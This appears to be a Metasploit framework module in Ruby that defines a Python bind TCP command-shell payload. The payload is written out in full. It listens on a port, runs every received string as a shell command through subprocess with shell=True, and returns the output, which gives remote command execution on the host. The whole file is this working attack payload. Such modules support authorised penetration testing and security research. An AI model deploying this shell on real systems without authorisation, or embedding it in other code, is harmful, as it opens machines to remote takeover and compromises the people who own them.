1
module MetasploitModule
2
  CachedSize = :dynamic
3

4
  include Msf::Payload::Single
5
  include Msf::Payload::Python
6
  include Msf::Sessions::CommandShellOptions
7

8
  def initialize(info = {})
9
    super(
10
      merge_info(
11
        info,
12
        'Name' => 'Command Shell, Bind TCP (via python)',
13
        'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
14
        'Author' => 'mumbai',
15
        'License' => MSF_LICENSE,
16
        'Platform' => 'python',
17
        'Arch' => ARCH_PYTHON,
18
        'Handler' => Msf::Handler::BindTcp,
19
        'Session' => Msf::Sessions::CommandShell,
20
        'PayloadType' => 'python',
21
        'Payload' => {
22
          'Offsets' => {},
23
          'Payload' => ''
24
        }
25
      )
26
    )
27
  end
28

29
  def generate(_opts = {})
30
    super + command_string
31
  end
32

33
  def command_string
34
    cmd = <<~PYTHON
35
      import socket as s
36
      import subprocess as r
37
      so=s.socket(s.AF_INET,s.SOCK_STREAM)
38
      so.bind(('#{datastore['RHOST']}',#{datastore['LPORT']}))
39
      so.listen(1)
40
      so,addr=so.accept()
41
      while True:
42
      	d=so.recv(1024)
43
      	if len(d)==0:
44
      		break
45
      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
46
      	o=p.stdout.read()+p.stderr.read()
47
      	so.send(o)
48
    PYTHON
49

50
    py_create_exec_stub(cmd)
51
  end
52
end
53

54